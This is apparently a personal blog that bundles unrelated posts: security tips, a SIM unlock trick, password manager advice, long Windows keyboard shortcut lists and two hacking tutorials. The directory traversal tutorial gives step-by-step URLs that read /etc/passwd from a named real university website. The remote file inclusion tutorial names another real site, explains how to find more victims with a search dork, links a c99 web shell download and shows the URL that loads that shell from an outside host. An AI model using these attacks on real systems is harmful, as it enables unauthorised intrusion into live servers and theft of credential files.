The Benefits of Network Security Audit

Network security audit, also known as network security assessment, refers to the process of determining the security shortcomings on your network. The process is critical for a business because sensitive or critical information on a network cannot be adequately protected if you do not know what type of vulnerabilities or security holes exist on the network.

Security auditing and assessing of your network is not a one-time event. Security assessments should be ongoing because networks are constantly changing as new devices are added, configurations are changed, and software is updated. With any type of security assessment, the network layout must first be determined. The network security audit must accurately determine the extent or topology of your business network. This is includes the type of devices, the operating system in use on the devices, and what updates that have been applied. Also, you must determine what the critical information assets are and where they are located on the network.

Without this information, a network security audit is of little value because you cannot be sure to have completed a security assessment of the whole network or that you have evaluated the most critical components of the network where the most sensitive information is stored and accessed. Of course, there is much more to performing a network security audit, but these few elements are essential to make a proper evaluation of your corporate network�s security.

Benefits of Network Security Audits

Network security audits help identify vulnerabilities on your network and network devices including:

• Running services � Any service that is running on a network device can be used to attack a system. A solid network security audit would help you identify all services and turn off any unnecessary services.

• Open ports � A network security audit will help you identify all open ports on network devices and, just like running services, all unneeded ports should be closed to eliminate the possibility of being used to attack a network device.

• Open Shares � Any open share can be exploited and should not be used unless there is some essential business purpose for it.

• Passwords � Assessments/audits should evaluate the enterprise password policy and ensure that the passwords used on the network devices meet the business password policy of password strength, frequent change, and other requirements.

• User Accounts � During the audit, you must determine which user accounts are no longer being used so they can be removed or disabled. Unused user accounts allow for someone from inside or outside the network to attack and take over the account or may be an indication of a successful attack of the network.

• Unapproved Devices � Unapproved or unknown devices such as iPods, Smart Phones and Wireless Access Points installed on your network must be detected in an audit. Any or all of these, as well as other devices, can be used to attack the network or steal data off the network.

• Applications � The type of applications being used on a system should be identified during this process. If any dangerous applications are found running on a system, they should be removed. Also look for software programs that run automatically because they can be an indicator of a malware infection.

Security audits should be done on an ongoing basis. Without recurring security audits or assessments, these new vulnerabilities may not be discovered and patched to keep the computer system secure. Also, such audits should not be done manually because if administrators fail to apply certain scans, vulnerabilities in the operating systems or in installed applications can be exploited.

Using vulnerability scanners makes the task of a security audits or assessments much easier and safer. These tools automate part of the process and allow administrators to analyze the results and determine what issues should be addressed first and in which priority the other security issues should be handled.

By identifying these types of vulnerabilities on an ongoing basis, you will be adding an extra layer of protection to your network. Because network security applications and services are constantly being updated, it is of great importance to apply one of the latest security scanners and use it on an ongoing basis, together with the expertise of knowledgeable security staff to evaluate the status of your network security.

Regards: Anshuman Kak a Script Kiddie

Hack a website using Directory Transversal attack?(taking www.chitkara.edu.in)

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean ?

The ..\ instructs the system to go one directory up. For example, we are at this location C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx .

Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except 'etc' which is default name , So I have

marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.

Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.

To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.

..

Regards:---- Anshuman kak a Script Kiddie.....

10 Fast and Free Security Enhancements ��?

 

Before you spend a time on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (_http://www.sygate.com/) and ZoneAlarm (_www.zonelabs.com) offer free versions.

3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de/). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., http://www.grisoft.com/). And double-check your AV with the free, online-only scanners available at www.pandasoftware.com/activescan and _http://housecall.trendmicro.com/.

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com/, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."

Regards: Anshuman Kak a Script Kiddie

Best Way To Change Sim without code

 Way to change sim without code.

1 - Put your new sim card inside the phone, but not totaly plugged (the phone don't see the sim and boot without)
2 - Put the batterie on but leave a little space to push forward the sim at the end
3 - Boot the phone, it will say 'no sim'
4 - Push the sim with something slim (a knife ie)
5 - reset the phone with the hard reset code *2767*3855#

additional step apply to the instructions above: when the phone prompt for a code, type 0000 first, optionally after that one the code of the simcard.

that's it.
Don't let the phone turn off, or you will need to re-do the same task again.

 Regards: Anshuman Kak a Script Kiddie

How to Protect yourself from password Hacking?

Prevention is always better than cure. If you would like to take the risk, a common

practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose.

Use complex passwords and do not write anywhere. And use passwords on internet

where SSL is enabled.





           Use Password manager like: KeePass Password safe?


 

Today you need to remember many passwords. You need a password for the Windows

network logon, your e-mail account, your homepage's FTP password, online passwords

(like website member account), etc. etc. etc. The list is endless. Also, you should use

different passwords for each account. Because if you use only one password everywhere

and someone gets this password you have a problem... A serious problem. The thief

would have access to your e-mail account, homepage, etc. Unimaginable.

KeePass.

KeePass is a free open source password manager, which helps you to manage your

passwords in a secure way. You can put all your passwords in one database, which is

locked with one master key or a key file. So you only have to remember one single

master password or select the key file to unlock the whole database. The databases are

encrypted using the best and most secure encryption algorithms currently known (AES

and Twofish).

After creating password database, just drag and drop to use passwords. This software is

portable run from pen drive also.

Download URL: http://keepass.info/

Happy E- Hacking

Posted by: Anshuman Kak

My Best Keyboard Shotcuts

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:

cmd = Command Prompt

iexplore + "web address" = Internet Explorer

compmgmt.msc = Computer Management

dhcpmgmt.msc = DHCP Management

dnsmgmt.msc = DNS Management

services.msc = Services

eventvwr = Event Viewer

dsa.msc = Active Directory Users and Computers

dssite.msc = Active Directory Sites and Services

Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.

Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box

acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.

Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager

msinfo32 = System Information

cleanmgr = Disk Cleanup

ntbackup = Backup or Restore Wizard (Windows Backup Utility)

mmc = Microsoft Management Console

excel = Microsoft Excel (If Installed)

msaccess = Microsoft Access (If Installed)

powerpnt = Microsoft PowerPoint (If Installed)

winword = Microsoft Word (If Installed)

frontpg = Microsoft FrontPage (If Installed)

notepad = Notepad

wordpad = WordPad

calc = Calculator

msmsgs = Windows Messenger

mspaint = Microsoft Paint

wmplayer = Windows Media Player

rstrui = System Restore

netscp6 = Netscape 6.x

netscp = Netscape 7.x

netscape = Netscape 4.x

waol = America Online

control = Opens the Control Panel

control printers = Opens the Printers Dialog

internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]

add www. and .com to word and go to it

For Windows XP:

Copy. CTRL+C

Cut. CTRL+X

Paste. CTRL+V

Undo. CTRL+Z

Delete. DELETE

Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE

Copy selected item. CTRL while dragging an item

Create shortcut to selected item. CTRL+SHIFT while dragging an item

Rename selected item. F2

Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW

Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW

Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW

Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW

Highlight a block of text. CTRL+SHIFT with any of the arrow keys

Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys

Select all. CTRL+A

Search for a file or folder. F3

View properties for the selected item. ALT+ENTER

Close the active item, or quit the active program. ALT+F4

Opens the shortcut menu for the active window. ALT+SPACEBAR

Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4

Switch between open items. ALT+TAB

Cycle through items in the order they were opened. ALT+ESC

Cycle through screen elements in a window or on the desktop. F6

Display the Address bar list in My Computer or Windows Explorer. F4

Display the shortcut menu for the selected item. SHIFT+F10

Display the System menu for the active window. ALT+SPACEBAR

Display the Start menu. CTRL+ESC

Display the corresponding menu. ALT+Underlined letter in a menu name

Carry out the corresponding command. Underlined letter in a command name on an open menu

Activate the menu bar in the active program. F10

Open the next menu to the right, or open a submenu. RIGHT ARROW

Open the next menu to the left, or close a submenu. LEFT ARROW

Refresh the active window. F5

View the folder one level up in My Computer or Windows Explorer. BACKSPACE

Cancel the current task. ESC

SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press

Move forward through tabs. CTRL+TAB

Move backward through tabs. CTRL+SHIFT+TAB

Move forward through options. TAB

Move backward through options. SHIFT+TAB

Carry out the corresponding command or select the corresponding option. ALT+Underlined letter

Carry out the command for the active option or button. ENTER

Select or clear the check box if the active option is a check box. SPACEBAR

Select a button if the active option is a group of option buttons. Arrow keys

Display Help. F1

Display the items in the active list. F4

Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:

Display or hide the Start menu. WIN Key

Display the System Properties dialog box. WIN Key+BREAK

Show the desktop. WIN Key+D

Minimize all windows. WIN Key+M

Restores minimized windows. WIN Key+Shift+M

Open My Computer. WIN Key+E

Search for a file or folder. WIN Key+F

Search for computers. CTRL+WIN Key+F

Display Windows Help. WIN Key+F1

Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L

Open the Run dialog box. WIN Key+R

Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds

Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN

Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK

Switch StickyKeys on and off. SHIFT five times

Switch ToggleKeys on and off. NUM LOCK for five seconds

Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:

Display the bottom of the active window. END

Display the top of the active window. HOME

Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)

Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)

Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)

Collapse current selection if it's expanded, or select parent folder. LEFT ARROW

Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

Hacking Website Using Remote File Inclusion

Remote file inclusion is one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

 

Searching For Vulnerability:

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one:

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

�inurl:index.php?page=�

This will show all the pages which has �index.php?page=� in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets Target a website i.e http://www.cbspk.com/

So the hacker will put following in url given below:

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up. Then  the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say e.g that the url of the shell is

http://h1.ripway.com/Anshumankak/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/Anshumankak/c99.txt?

Remember: At the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.....

Regards Anshuman kak a Script Kiddie....